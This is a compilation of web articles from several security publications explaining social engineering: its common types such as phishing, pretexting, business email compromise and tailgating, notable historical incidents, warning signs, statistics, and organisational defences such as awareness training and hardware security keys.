The request is out of the ordinary . You may have received a message from the same sender before, but never received this type of request. For example, say you get a request from your manager to send them money, which they've never done before. This is another strong indicator of a social engineering attack.
There is an unusual file attachment or URL . Many social engineering schemes involve a potentially dangerous file or URL. Potentially malicious file formats include those that end in EXE, DLL, URL, SCR, HTA, HTM, HTML, MSI, SYS, and ZIP. Potentially malicious URLs may contain lots of percentage symbols, random characters, or the name of another well-known brand.
There is a sense of urgency . The request may be normal but conveyed with a heightened sense of urgency. For example, the request may be to enter your login credentials as soon as possible or you'll be locked of your account. This is another high-risk trait of a social engineering attack. The malicious actor wants to motivate the potential victim with a threat of harm.

SOC 1 ® , SOC 2 ® and SOC 3 ® are registered trademarks of the American Institute of Certified Public Accountants in the United States. The AICPA ® Trust Services Criteria for Security, Availability, Processing Integrity, Confidentiality, and Privacy is copyrighted by the Association of International Certified Professional Accountants. All rights reserved.

Artificial Intelligence
Generative AI
Business Operations
IT Leadership
Application Security
Business Continuity
Cloud Security
Critical Infrastructure
Identity and Access Management
Network Security
Physical Security
Risk Management
Security Infrastructure
Vulnerabilities
Software Development
Enterprise Buyer’s Guides
United States
United Kingdom
Newsletters
Foundry Careers
Terms of Service
Privacy Policy
Cookie Policy
Copyright Notice
Member Preferences
About AdChoices
E-commerce Links
Your California Privacy Rights

Our Network

Computerworld
Network World

Social engineering: Definition, examples, and techniques

Social engineering is the art of exploiting human psychology, rather than technical hacking techniques, to gain access to buildings, systems, or data. train yourself to spot the signs..

What is social engineering?

Social engineering is the art of exploiting human psychology, rather than technical hacking techniques, to gain access to buildings, systems, or data.

For example, instead of trying to find a software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to trick the employee into divulging his password.

Famous hacker Kevin Mitnick helped popularize the term ‘social engineering’ in the ’90s, although the idea and many of the techniques have been around as long as there have been scam artists.

Even if you’ve got all the bells and whistles when it comes to securing your data center, your cloud deployments, your building’s physical security, and you’ve invested in defensive technologies, have the right security policies and processes in place and measure their effectiveness and continuously improve, still a crafty social engineer can weasel his way right through (or around).

How does social engineering work?

The phrase “social engineering” encompasses a wide range of behaviors, and what they all have in common is that they exploit certain universal human qualities: greed, curiosity, politeness, deference to authority, and so on. While some classic examples of social engineering take place in the “real world”—a man in a FedEx uniform bluffing his way into an office building, for example—much of our daily social interaction takes place online, and that’s where most social engineering attacks happen as well. For instance, you might not think of phishing or smishing as types of social engineering attacks, but both rely on tricking you—by pretending to be someone you trust or tempting you with something you want—into downloading malware onto your device.

This brings up another important point, which is that social engineering can represent a single step in a larger attack chain. A smishing text uses social dynamics to entice you with a free gift card, but once you tap the link and download malicious code, your attackers will be using their technical skills to gain control of your device and exploit it.

Social engineering examples

A good way to get a sense of what social engineering tactics you should look out for is to know about what’s been used in the past. We’ve got all the details in an extensive article on famous social engineering attacks , but for the moment let’s focus on three social engineering techniques — independent of technological platforms — that have been successful for scammers in a big way.

Offer something sweet. As any con artist will tell you, the easiest way to scam a mark is to exploit their own greed. This is the foundation of the classic Nigerian 419 scam, in which the scammer tries to convince the victim to help get supposedly ill-gotten cash out of their own country into a safe bank, offering a portion of the funds in exchange. These “Nigerian prince” emails have been a running joke for decades, but they’re still an effective social engineering technique that people fall for: in 2007 the treasurer of a sparsely populated Michigan county gave $1.2 million in public funds to such a scammer in the hopes of personally cashing in. Another common lure is the prospect of a new, better job, which apparently is something far too many of us want: in a hugely embarrassing 2011 breach, the security company RSA was compromised when at least two low-level employees opened a malware file attached to a phishing email with the file name “2011 recruitment plan.xls.”

Fake it till you make it. One of the simplest — and surprisingly most successful — social engineering techniques is to simply pretend to be your victim. In one of Kevin Mitnick’s legendary early scams, he got access to Digital Equipment Corporation’s OS development servers simply by calling the company, claiming to be one of their lead developers, and saying he was having trouble logging in; he was immediately rewarded with a new login and password. This all happened in 1979, and you’d think things would’ve improved since then, but you’d be wrong: in 2016, a hacker got control of a U.S. Department of Justice email address and used it to impersonate an employee, coaxing a help desk into handing over an access token for the DoJ intranet by saying it was his first week on the job and he didn’t know how anything worked.

Many organizations do have barriers meant to prevent these kinds of brazen impersonations, but they can often be circumvented fairly easily. When Hewlett-Packard hired private investigators to find out which HP board members were leaking info to the press in 2005, they were able to supply the PIs with the last four digits of their targets’ social security number — which AT&T’s tech support accepted as proof of ID before handing over detailed call logs.

Act like you’re in charge. Most of us are primed to respect authority — or, as it turns out, to respect people who act like they have the authority to do what they’re doing. You can exploit varying degrees of knowledge of a company’s internal processes to convince people that you have the right to be places or see things that you shouldn’t, or that a communication coming from you is really coming from someone they respect. For instance, in 2015 finance employees at Ubiquiti Networks wired millions of dollars in company money to scam artists who were impersonating company executives, probably using a lookalike URL in their email address. On the lower tech side, investigators working for British tabloids in the late ’00s and early ’10s often found ways to get access to victims’ voicemail accounts by pretending to be other employees of the phone company via sheer bluffing; for instance, one PI convinced Vodafone to reset actress Sienna Miller’s voicemail PIN by calling and claiming to be “John from credit control.”

Sometimes it’s external authorities whose demands we comply with without giving it much thought. Hillary Clinton campaign honcho John Podesta had his email hacked by Russian spies in 2016 when they sent him a phishing email disguised as a note from Google asking him to reset his password. By taking action that he thought would secure his account, he actually gave his login credentials away.

Types of social engineering

Phishing, as we noted above, which also includes text-based smishing and voice-based vishing These attacks are often low-effort but widely spread; for instance, a phisher might send out thousands of identical emails, hoping someone will be gullible enough to click on the attachment.
Spear phishing , or whaling, is a “high-touch” variation of phishing for high-value targets. Attackers spend time researching their victim, who’s usually a high-status person with a lot of money they can be separated from, in order to craft unique and personalized scam communications.
Baiting is a key part of all forms of phishing and other scams as well—there’s always something to tempt the victim, whether a text with a promise of a free gift card or something much more lucrative or salacious.
Pretexting involves creating a story, or pretext, to convince someone to give up valuable information or access to some system or account. A pretexter might manage to find some of your personally identifying information and use it to trick you—for instance, if they know what bank you use, they might call you up and claim to be a customer service rep who needs to know your account number to help with a late payment. Or they could use the information to imitate you—this was the technique used by those HP PIs we discussed above .
Business email compromise (BEC), also known as CEO fraud, combines several of the above techniques. An attacker either gains control of a victim’s email address or manages to send emails that look like they’re from that address , then start sending emails to subordinates at work requesting the transfer of funds to accounts they control.

[Related reading: Israeli threat group uses fake company acquisitions in CEO fraud schemes ]

In a quid pro quo attack, a hacker offers something in exchange for access or information. A tech support scam is a typical example of a quid pro quo attack.
Tailgating is an in-real-life form of social engineering in which an attacker tricks an employee into following them into the building, hence ‘tailgating.’ This is achieved, for example by pretending to be a delivery person or pretending to be an employee who forgot their badge and takes advantage of the human desire to be helpful and nice.

How to spot social engineering attacks

The security company Norton has done a pretty good job of outlining some red flags that could be a sign of a social engineering attack . These apply across social and technological techniques, and are good to keep in the back of your mind as you try to stay on guard:

Someone you know sends an unusual message: Stealing or mimicking someone’s online identity and then mining their social circles is relatively easy for a determined attacker, so if you get a message from a friend, relative, or coworker that seems off, be very sure you’re really talking to them before you act on it. It’s possible that your granddaughter really is on a vacation she didn’t tell you about and needs money, or that your boss really does wants you to wire a six-figure sum to a new supplier in Belarus, but that’s something for you to triple-check before you hit send.
A stranger is making an offer that’s too good to be true: Again, we all laugh at the Nigerian prince emails, but many of us still fall for scams that trick us by telling us we’re about to get something we never expected and never asked for. Whether it’s an email telling you won a lottery you didn’t enter or a text from a weird number offering you a free gift card just for paying your phone bill on time, if it feels too good to be true, it probably is.
Your emotions are heightened and you have to act now: Social engineering scammers play on strong emotions—fear, greed, empathy—to inculcate a sense of urgency specifically so you don’t stop to think twice about scenarios like the ones we just outlined. A particularly pernicious technique in this realm is a tech support scam, which preys on people who are already nervous about hacks but not very tech savvy: you hear from an aggressive person who claims to be from Google or Microsoft, tells you that your system has been compromised, and demands that you change your passwords right away—tricking you into revealing your credentials to them in the process.

How to avoid being a victim of social engineering

Fighting against all of these techniques requires vigilance and a zero-trust mindset. That can be difficult to inculcate in ordinary people; in the corporate world, security awareness training is the number one way to prevent employees from falling prey to high-stakes attacks. Employees should be aware that social engineering exists and be familiar with the most commonly used tactics.

Some basic tips to avoid falling victim to social engineering attacks include:

Resist the urge to click links in a suspicious email.
Check the Web address of a link (by placing your mouse cursor over the link) and the sender’s email address before visiting the destination website.
Visit websites directly rather than clicking links in emails.
Be cautious of email attachments, even if it looks like it’s from a familiar sender.
Check for signs such as poor quality of the logo or email, poor grammar or misspellings.

Fortunately, social engineering awareness lends itself to storytelling. And stories are much easier to understand and much more interesting than explanations of technical flaws. Quizzes and attention-grabbing or humorous posters are also effective reminders about not assuming everyone is who they say they are.

But it isn’t just the average employee who needs to be aware of social engineering. As we saw, social engineers focus on high-value targets like CEOs and CFOs. Senior leadership often resists going to the trainings mandated for their employees, but they need to be aware of these attacks more than anyone.

How to defend against social engineering

CSO contributor Dan Lohrmann offers the following advice:

Train and train again when it comes to security awareness. Ensure that you have a comprehensive security awareness training program in place that is regularly updated to address both the general phishing threats and the new targeted cyberthreats. Remember, this is not just about clicking on links.
Provide a detailed briefing “roadshow” on the latest online fraud techniques to key staff. Yes, include senior executives, but don’t forget anyone who has authority to make wire transfers or other financial transactions. Remember that many of the true stories involving fraud occur with lower-level staff who get fooled into believing an executive is asking them to conduct an urgent action — usually bypassing normal procedures and/or controls.
Review existing processes, procedures, and separation of duties for financial transfers and other important transactions. Add extra controls, if needed. Remember that separation of duties and other protections may be compromised at some point by insider threats, so risk reviews may need to be reanalyzed given the increased threats.
Consider new policies related to “out of band” transactions or urgent executive requests. An email from the CEO’s Gmail account should automatically raise a red flag to staff, but they need to understand the latest techniques being deployed by the dark side. You need authorized emergency procedures that are well-understood by all.
Review, refine and test your incident management and phishing reporting systems. Run a tabletop exercise with management and with key personnel on a regular basis. Test controls and reverse-engineer potential areas of vulnerability.

Social engineering statistics

Business email compromise (BEC) attacks comprise 50% of all social engineering (source: Verizon’s DBIR for 2023).

$50 billion

$50 billion was lost to BEC attacks between October 2013 and December 2022 (source: FBI )

Smishing comprises 39% of mobile threats (source: SlashNext )

Social engineering attacks increased 45% in 2023, coincident with the launch of ChatGPT (source: SlashNext )

At 17% of all intrusions, phishing is the second most common initial infection vector for malware (source: Mandiant’s M-Trends 2024 report.)

Social engineering resources

A number of vendors offer tools or services to help conduct social engineering exercises, and/or to build employee awareness via means such as posters and newsletters.

Also worth checking out is social-engineer.org’s Social Engineering Toolkit , which is a free download. The toolkit helps automate penetration testing via social engineering, including spear phishing attacks, creation of legitimate-looking websites, USB drive-based attacks, and more.

Another good resource is The Social Engineering Framework .

Currently, the best defense against social engineering attacks is user education and layers of technological defenses to better detect and respond to attacks. Detection of key words in emails or phone calls can be used to weed out potential attacks, but even those technologies will probably be ineffective in stopping skilled social engineers.

More from this author

What is the cia triad a principled framework for defining infosec policies, crisc certification: exam, requirements, training, potential salary, tabletop exercise scenarios: 10 tips, 6 examples, what is swatting criminal harassment falsely involving armed police, ccsp certification: exam, cost, requirements, training, salary, certified ethical hacker (ceh): certification cost, training, and value, whitelisting explained: how it works and where it fits in a security program, download our password managers enterprise buyer’s guide, most popular authors.

Gyana Swain

Show me more

Sap patches critical bugs allowing full system compromise.

Cybersecurity should return to reality and ditch the hype

Microsoft patches six actively exploited vulnerabilities

CSO Executive Sessions: Guardians of the Games - How to keep the Olympics and other major events cyber safe

CSO Executive Session India with Dr Susil Kumar Meher, Head Health IT, AIIMS (New Delhi)

CSO Executive Session India with Charanjit Bhatia, Head of Cybersecurity, COE, Bata Brands

Cybersecurity Insights for Tech Leaders: Addressing Dynamic Threats and AI Risks with Resilience

Social Engineering: How A Teen Hacker Allegedly Managed To Breach Both Uber And Rockstar Games

Share to Facebook
Share to Twitter
Share to Linkedin

Rockstar Games—the developers of the popular Grand Theft Auto series of video games—was hacked just days after ride-hailing giant Uber’s servers were targeted in a similar breach, purportedly by the same hacker who used a process called social engineering, a highly effective mode of attack that relies on deceiving employees of a targeted company and can be difficult to guard against.

An alleged teenage hacker managed to breach the internal database of Rockstar Games and leaked ... [+] videos of an unannounced sequel to the blockbuster Grand Theft Auto video game franchise.

Similar to the Uber hack , the hacker who goes by the alias “TeaPot” alleged he gained access to Rockstar Games’ internal messages on Slack and early code for their unannounced Grand Theft Auto sequel by gaining access to an employee's login credentials.

While the exact details of the Rockstar breach are unclear, in Uber’s case the hacker claimed he masqueraded as a company IT person and convinced an employee to share their login credentials.

Unlike other modes of attacks that rely on flaws in a company’s security architecture, social engineering targets people and relies on manipulation and deception.

Experts contend that humans still remain the “weakest link” in cybersecurity as they can be easily deceived to click on malicious links or share their login credentials.

Unlike other methods, social engineering is also effective in defeating certain enhanced security measures like one-time passwords and other multifactor authentication methods.

Crucial Quote

Rachel Tobac, the CEO of cybersecurity firm SocialProof Security and an expert on social engineering tweeted : “The hard truth is that most [organizations] in the world could be hacked in the exact way Uber was just hacked…Many [organizations] still don’t use [Multi Factor Authentication] internally…& don’t use password managers (which leads to saving creds in easily searchable places once an intruder gets in).”

Key Background

Social engineering has been used to carry out several high-profile hacks in recent years, including the hijacking of more than 100 prominent Twitter accounts—among them Elon Musk, former President Barack Obama, Bill Gates and Kanye West—which were then used to promote a bitcoin scam. The hacks were carried out by teenagers who managed to gain access to Twitter’s internal networks by targeting “a small number of employees” according to the social media company. Last month, both Cloudflare and Twilio were also targeted in a type of social engineering attack called “phishing” where employees were tricked into opening a message that was disguised to appear as legitimate company communication but included a malicious link. Twilio, which provides messaging and two-factor authentication services, disclosed that the hackers had managed to breach the company's internal databases and gained access to an undisclosed number of customer accounts. Cloudflare, an online content delivery network, noted the hackers were not able to access its internal network.

Unlike Twilio, Uber and Rockstar, which had their internal systems breached, Cloudflare managed to avoid this fate due to its use of hardware-based security keys . Unlike other multifactor authentication methods like text messages and one-time passwords, hardware security keys are much more secure against social engineering attacks. A targeted employee can be tricked into sharing the details of a text message or a one-time password but the hacker needs to gain physical possession of a hardware security key to gain access to an account. Hardware security keys come in various forms including USB sticks or Bluetooth dongles and they need to be plugged in or connected to a device that is trying to gain access to a protected account. Hackers who gain access to employee credentials will not be able to access their accounts that use this form of security without physically gaining access to their keys. In 2018, Google announced that none of its 85,000 had successfully been targeted through a phishing attack after it mandated the use of physical security keys a year earlier.

323,972. That is the total number of complaints of social engineering attacks received by the FBI in 2021—almost three times higher than what it was in 2019—according to the agency’s annual Internet Crime Report . During this period, hackers managed to steal a total of $2.4 billion by compromising business email accounts through social engineering techniques.

What To Watch For

Bloomberg’s Jason Schreier speculated the recent hack may prompt Rockstar to place restrictions on remote work. Cybersecurity experts have previously argued that remote work may require more precautions as it leaves employees more vulnerable to social engineering attacks.

BreachSight

Vendor risk, trust exchange, product features, vendor risk assessments, security questionnaires.

Security Ratings

Data Leaks Detection

Integrations

AI Autofill

Financial Services

eBooks, Reports, & more

What is social engineering definition + attack examples.

Abi Tyas Tunggal

Social Engineering, in the context of cybersecurity, is the process of tricking people into divulging private information that can be useful in a cyberattack.

There are many different types of social engineering attacks. Some forms of social engineering are convincing emails or text messages infected with links leading to malicious websites. Others involve more effort, like a phone call from a cybercriminal pretending to be tech support requesting confidential information.

Social engineering attacks are popular because they help cybercriminals avoid the arduous effort of locating and exploiting security vulnerabilities to access a network. Instead, manipulated employees essentially hand threat actors the keys to the network

Because they make cyberattacks significantly easier, social engineering attacks are growing in popularity. According to the State of Cybersecurity Survey by ISACA , social engineering was the number one cyber threat responsible for business compromise.

social engineering was most responsible for business compromise in 2020

13 Examples of Social Engineering Techniques

Common social engineering attacks include:

A type of social engineering where an attacker leaves a physical device (like a USB) infected with a type of malware where it's most likely to be found. When a victim inserts the USB into their computer, a malware installation process is initiated.

Diversion Theft

Diversion theft is when social engineers trick a delivery company into sending the package to a different location so that it can be intercepted.

A honey trap is when a con artist poses as an attractive person online with the objective of stealing personally identifiable information (PII) , like phone numbers and email account details, from the individuals they interact with.

Phishing attacks gather sensitive information like login credentials, credit card numbers, bank account details by masquerading as a trusted source.

The most common phishing scam is a fake email that seems like it was sent by an authoritative sender.

Here's an example of a phishing email that looks like a legitimate communication from the World Health Organization.

The links in phishing emails are embedded with malicious codes. When clicked, victims are usually directed to a web page that's a replica of the business website the email is claiming to represent. This could be a fake login page to a financial institution or a fake login portal to your intranet.

Some of these fake pages are indistinguishable from their real-world inspirations. When unsuspecting victims submit their information, their credentials are sent to the hacker who then logs into the legitimate website being mirrored in the attack.

Phishing emails often create a sense of urgency to make the victim feel that divulging information quickly is important. Despite not always having a sophisticated design, phishing attacks are one of the most critical cybersecurity risks .

Some spam filters, such as Microsoft's filter , are designed to send potential phishing emails directly to the junk folder. These filters are not always accurate so it's important to always maintain a zero-trust mindset when reviewing receiving emails.

Spear Phishing

Spear phishing is specifically an email spoofing attack targeting a specific organization or individual. Spear phishing emails aim to infect the victim with ransomware or trick them into revealing sensitive data and sensitive information.

Smishing or SMS phishing is phishing performed over SMS rather than the traditional medium of email.

Pretexting is the process of lying to gain access to personal data or other privileged information. For example, a fraudster may pose as a third-party vendor , saying they need to know your full name and title to verify your identity.

Quid Pro Quo

A quid pro quo is a type of social engineering attack that exploits the human tendency to reciprocate good gestures.

For example, an attacker may provide free technical support over a phone call to a victim and then request that they turn off their antivirus to support an upcoming system update. The victim is then pressured to oblige to reciprocate the generous assistance they were given.

If a victim is very accommodating, cybercriminals will continue using them to advance the cyberattack. Following on from the above example, after turning off all antivirus software the victim could then be asked to install a trojan masking as the "software update", leading to the entire network falling under the cybercriminal's control.

Rogue Security Software

Rogue security software or scareware is fake security software that falsely identifies the presence of malware on a computer. After "detection" the end-user receives a pop-up requesting payment for removal. Pop-ups will continue happening with increasing urgency until payment is made.

Tailgating or piggybacking is when an attacker follows a person into a secure area. This type of attack relies on the person being followed assuming the intruder is authorized to access the targeted area.

Vishing or voice phishing is conducted by phone and often targets users of Voice over IP (VoIP) services like Skype . Vishing paired with voice deep fakes is a massive cybersecurity risk . According to The Wall Street Journal , a vishing attack resulted in the CEO of a UK-based energy firm sending $243,000 to an attacker's bank account because he thought he was on the phone to his boss.

Waterholing

A watering hole attack is when an attacker targets a specific group of people by infecting a website they know and trust. The attack could involve exploiting an outdated SSL certificate , typosquatting , lack of DNSSEC , or domain hijacking .

Whaling is a form of spear phishing targeting high-profile individuals like public company executives, politicians or celebrities. For example, whaling attacks often come in the form of a fake request from the CEO asking the HR department to change their existing payroll details to those set up by the phisher.

4 Examples of Popular Social Engineering Attacks

The trojan horse.

The most famous social engineering attack comes from an Ancient Greek story of deception. An army of soldiers hid inside a wooden trojan horse that was given as a peace offering to the city of Troy. Troy accepted the gift and that night all the soldier snuck out and conquered the city.

The modern Trojan operates under the same principle. Cybercriminals present seemingly innocuous software solutions, like a virus scanner or software update, that contains a hidden malware installer.

RSA Data Breach

A successful social engineering attack led to the 2011 data breach of RSA. Attackers sent two phishing emails over two days to a group of RSA employees with the subject line of "2011 Recruitment Plan." When opened, an infected Excel document exploited an Adobe Flash vulnerability (CVE-2011-0609).

Target Data Breach

In 2013, Target suffered a massive data breach which started with a third-party vendor falling for a phishing email. The email contained a trojan that helped attackers gain access to Target's POS system, resulting in the theft of 40 million credit card details .

Mispadu: Malvertising for Fake McDonald's Coupons

A bank credential-stealing trojan known as Mispadu was deployed via Facebook ads for fake McDonald's coupons. The ads targeted residents in Brazil and Mexico. When users attempted to access the coupons, a zip file containing the trojan was downloaded and installed on their computer.

Mispadu malvertising campaign - Source: welivesecurity.com

Mispadu scans web browsers, email clients, and even the clipboard database for banking credential information. The trojan also attempts to replace existing bitcoin wallets with its own wallet.

12 Ways to Prevent Social Engineering Attacks in 2022

You and your employees will have the best chances of evading social engineering attacks by following these 12 prevention strategies.

1. Educate Employees

Ignorance is the primary reason employees fall victim to Social Engineering attacks. Organizations should implement security awareness training to educate their staff about how to respond to common breach attempts

For example, what to do when private information is requested or when someone attempts to tailgate an employee into the office.

The following list outlines some of the most common cyberattacks. Each link will open a blog post that can be used for cybercrime awareness training in the workplace:

Phishing attacks
DDoS attacks
Ransomware attacks
Malware attacks
Clickjacking attacks
How to respond to tailgating

2. Establish Security Policies

Outline how all employees should respond to social engineering attempts in your information security policy and incident response plan . By ensuring everyone follows the best response practices, you'll have the highest chances of defending against these attacks.

3. Scrutinize All Information

Teach employees to scrutinize every email they receive and every device they plug into their computer. Identifying what information is sensitive and evaluating how it could be exposed during a social engineering attack can help organizations build in countermeasures and mitigate cybersecurity risk .

4. Establish Security Protocols

Establish an information risk management program that has security protocols, policies, and procedures that outline how to handle data security .

5. Test Attack Resilience

Test your organization and perform controlled social engineering attacks against it. Send fake phishing emails and gently correct staff members that click malicious links, open attachments, or respond. These events should be viewed as very teachable moments rather than cybersecurity failure

6. Increase Test Attacks

Just like a vaccination, your organization can become more resistant to social engineering attacks if they are exposed to them frequently, this is why testing multiple times a year is important.

7. Review Response Protocols

Review your countermeasures and training against social engineering attacks over time and improve or discard outdated information.

8. Secure All Waste

Use a secure waste management service so that attackers can't plan attacks by studying information in either physical or digital dumpsters.

9. Use Multi-Factor Authentication

Enforce a multi-factor authentication process that requires users to know something (a password), have something (a token), and be something ( biometrics ) before access to sensitive resources is granted.

10. Operations Security

OPSEC is a process that identifies friendly actions that could be useful for a potential attacker. If properly analyzed and grouped with other data, OPSEC will reveal critical information or sensitive data . By employing OPSEC practices, you can reduce the amount of information social engineers can gather.

11. Implement a Third-Party Risk Management Framework

It's no longer enough to solely focus on your organization's cyber resilience and cybersecurity, Third-party vendors are increasingly processing large amounts of client personally identifiable information (PII) and protected health information (PHI) which makes them prime targets for social engineers targeting your data.

Develop a third-party risk management framework , vendor management policy and perform a cybersecurity risk assessment before onboarding new vendors or continuing to use existing vendors. It's much easier to prevent data breaches than clean them up, especially after stolen data has been sold on the dark web . Look for software that can automate vendor risk management and continuously monitor and rate your vendors' cybersecurity rating .

12. Detect Data Leaks

It can be hard to know when credentials have been exposed during a phishing attack. Some phishers may wait months or years to use the credentials they collect, which is why your organization should be continuously scanning for data exposures and leaked credentials .

Why Do Cybercriminals Use Social Engineering?

Cybercriminals use social engineering techniques to conceal their true identity and present themselves as trusted sources or individuals. The objective is to influence, manipulate or trick victims into giving up personal information so that it can be used to access a targeted network.

Most social engineering exploits people's willingness to be helpful. For example, the attacker may pose as a co-worker who has an urgent problem, like an overdue invoice that needs to be paid.

Social engineering is an increasingly popular way to subvert information security because it is often easier to exploit human weaknesses than network security or vulnerabilities . This is why social engineering is often used as the first stage of a larger cyber attack designed to infiltrate a system, install malware or expose sensitive data .

How Does Social Engineering Work?

The first step for most social engineering attacks is to gather information on the target.

For example, if the target is an organization, attackers can exploit poor OPSEC practices to gather intelligence on corporate structure, internal operations, industry jargon, third-party vendors . Public-facing information, such as social media profiles, is also targeted.

When cyber attackers are ready to strike their first target is usually a low-level employee who's manipulated to achieve network access. The objective of this step is to avoid contending with firewalls and other security controls located at the network boundary.

Threat actors can rarely instantly exploit sensitive resources when they first gain access to a network. To burrow deeper, they move laterally inside the network in search of higher privilege credentials to compromise. This activity is usually hidden behind legitimate processes to evade antivirus detection.

Social engineering attacks expose sensitive information, like social security numbers or credit card numbers, and lead to data breaches and data leaks of personally identifiable information (PII) and protected health information (PHI) .

What are the Six Principles of Influence Abused in Social Engineering?

All social engineering tactics rely on exploiting aspects of human interaction and decision-making known as cognitive biases. Think of biases as vulnerabilities in 'human software' that be exploited, just like CVEs can be exploited to access a private network.

The social engineering framework is based on the six principles of influence outlined by Robert Cialdini, Professor Emeritus of Psychology and Marketing at Arizona State University

1. Reciprocity

People tend to want to return a favor, which explains the pervasiveness of free samples in marketing. A scammer may give the target something for free and then request access to sensitive information.

Social engineering example of reciprocity:

An attacker's demonstration of kindness makes a victim feel compelled to echo the sentiment by complying with sensitive data requests.

2. Commitment and Consistency

If people commit, either vocally or in writing, to a goal or idea, they're more likely to honor the commitment, even if the original motivation is removed.

Social engineering example of commitment and consistency:

An employee follows through with an attacker's request for login credentials because they originally agreed to supply it, even if they understand it shouldn't be done.

3. Social Proof

People tend to do things other people are doing.

Social engineering example of social proof

An attacker provides false evidence that a victim's colleague has collaborated with them recently, compelling the victim to also comply.

4. Authority

People tend to obey authority figures even if asked to do objectionable acts. This is why spear-phishing campaigns that impersonate a CEO and target low-level employees of the same company are usually successful.

Social engineering example of authority

An attacker poses as an authoritative figure, either within the targeted workplace or in society, such as a police officer, lawyer, etc.

People are easily persuaded by people they like. This is why spear phishers often masquerade as a colleague or friends in their campaigns.

Social engineering example of liking

An attack compliments a victim to seem likable.

6. Scarcity

Perceived scarcity increases demand. This scarcity tactic makes social engineering attacks feel very urgent, and therefore, important.

Social engineering example of scarcity

An attacker presents an urgent need for a set of credentials in order to access internal software and complete an expiring sales call.

4 Examples of Notable Social Engineers

Notable social engineers include:

Kevin Mitnick

Based in the United States, Mitnick is a computer security consultant, author, and hacker, best known for his high-profile arrest in 1995 and five-year conviction for various computer and communications-related crimes.

In the video below Kevin describes how he used social engineering to exploit the paper ticketing system of an L.A. bus network at 12 years of age.

Susan Headley

During the late 1970s and early 1980s, Susan Headly (or Susan Thunder as she was known) became famous for her expertise in social engineering, pretexting, and psychological subversion.

Learn more about Susan Headley.

Badir Brothers

Ramy, Muzher and Shaddle Badir, brothers who were all blind from birth, set up an extensive phone and computer fraud scheme in Israel in the 1990s. This operation was comprised of social engineering, vishing, and Braille-display computers.

Learn more about the Badir Brothers.

Frank Abagnale

Frank Abagnale is an American security consultant known for his background as a former con man, check forger, and impostor between the ages of 15 and 21.

His tactics and escapades are depicted in the best-selling novel and movie Catch Me If You Can. This publicity arguably makes Abagnale the world's most famous social engineer.

Learn more about Frank Abagnale. ‍

Reviewed by

Kaushik Sen

Ready to see upguard in action, ready to save time and streamline your trust management process, join 27,000+ cybersecurity newsletter subscribers.

Responding to Emerging Threats

The top cybersecurity websites and blogs of 2024, 14 cybersecurity metrics + kpis you must track in 2024, what are security ratings cyber performance scoring explained, why is cybersecurity important, what is typosquatting (and how to prevent it), introducing upguard's new sig lite questionnaire.

UpGuard Vendor Risk
UpGuard BreachSight
Product Video
Release notes
SecurityScorecard
All comparisons
Security Reports
Instant Security Score
Third-Party Risk Management
Attack Surface Management
Cybersecurity

Social Engineering: Definition, Examples, Types of Attacks and How to Prevent Them

Nick Harrahill

Director of Support

What is social engineering?

How social engineering works, what are the different types of social engineering attacks, how to protect your organization from social engineering attacks.

Social engineering has become one of the most efficient attack vectors for cybercriminals. This article unpacks its types, techniques, and stages and provides the best methods to minimize the associated risks.

The term ‘social engineering’ is used in IT security and political science. In both fields, it means influencing the minds of humans to control them. People subject to social engineering are seen as justifiable targets of instrumentalization and manipulation.

In IT security, social engineering is a body of psychological manipulation methods to induce a specific target’s behavior.

Usually, it is a part of a ‘larger’ criminal scheme. The purpose of this crime is to obtain access to data that can be used to obtain money or achieve other goals. Social engineering attacks can happen both online and offline, the former bearing fewer risks for attackers.

For this article, we will differentiate between three terms:

The target of social engineering attacks is the person that is being manipulated.
The ‘victim’ is the entity (a person or organization they work at) harmed by the crime.
The ‘victim by proxy’ is any third-party entity (person or organization) that was harmed as a result of the cybercrime.

Sometimes the victim and the target are the same person. For example, social engineers pretend to be an employee of a target bank and obtain the target’s credentials. Then they steal money from the target’s account. This happens mostly in cybercrime incidents against individuals.

In more complex schemes, the victim is usually an organization, and the target is its employee. For example, a double extortion ransomware attack uses social engineering against an employee to infect the IT environments of a company. In this case, the ‘target by proxy’ is a client of the company whose data was stolen by criminals and sold on the Dark Web.

Note this article’s scope is social engineering as an IT security phenomenon with a focus on cybercrime against organizations.

What are the origins of social engineering?

Social engineering uses deceit and manipulation on the one hand and trust and human weaknesses on the other. All these behaviors and psychological characteristics, along with our need for control, are the basics of human nature and possibly come from the deception techniques of other species. For example, some apes are capable of consciously lying.

Various ancient mythologies and religions told stories about social engineering as a warning against gullibility. The Trojan Horse and Eve eating the Apple are the most known examples in the West. Interestingly, Ancient Greeks praised lying and even created sophistry.

The more recent examples of social engineering include:

The sale of the Eiffel Tower for metal scraps in 1925.
The stealing of $10M from Security Pacific National Bank over the phone in the 1970s.
419 scam: cybercriminals request a target to make a small payment in return for a future share in a larger amount of money. The scam first started via regular mail and then turned to more modern technologies like email.

How has technology changed social engineering attacks?

The development of technology has facilitated social engineering attacks in the following ways:

1. Attacks became safer for criminals because technology provides anonymity. When a criminal doesn’t engage with their victim or target directly, there’s no that their face will be remembered and recognized or recorded on a security camera. Also, there’s no chance of leaving behind fingerprints, DNA, or other clues.

Payments using cryptocurrency also enable social engineers to remain in the shadows.

2. Technology enables criminals to target people all over the world. It enables them to act in countries with no or gray legislation on cybercrime and remain unpunished. Government-funded advanced persistent threat actors are even protected by their respective countries.

3. Technologies like deep fake enable criminals to impersonate various people successfully, e.g., in CEO fraud.

The Risks of Social Engineering Attacks

A single successful social engineering attack can have a severe impact on an organization. Here are some of the most widely spread:

1. Financial loss

A cyber attack can cause substantial financial losses, including loss of revenue due to the halt of operations, additional costs for incident response, and ransom payments to cyber criminals. In the case of industrial espionage, the company can suffer from the actions its competitors take after obtaining sensitive information.

2. Reputational loss

A cyber security incident negatively impacts the reputation of a company leading to the loss of potential and existing clients.

3. Downtime

After a security breach, an organization’s operations are suspended for some time. For example, a ransomware attack makes it impossible for people to work with the company’s data as it has been encrypted.

4. Legal implications

The quantity of laws and regulations governing IT security and data protection has been steadily growing over the past three decades. The government can additionally punish the victim of a social engineering attack for not taking necessary actions for data protection.

Victims by proxy of an attack can also sue the victim of an attack.

5. Impact on employees’ wellbeing

Crime causes distress in employees and impacts their performance. Some people even leave the organization after it has fallen victim to crime.

6. Termination of business

The impact of social engineering attacks can deteriorate organizations to the point when they terminate their operations. For example, in 2022, Lincoln College shut down after 157 years of work.

7. Impact on the dependants of an organization

Clients and partners of victims of social engineering attacks often become victims by proxy. It is especially severe in the case of hospitals, critical infrastructure, or service providers. For example, a ransomware attack on CommonSpirit, the electronic record system, wreaked havoc in many hospitals across the US.

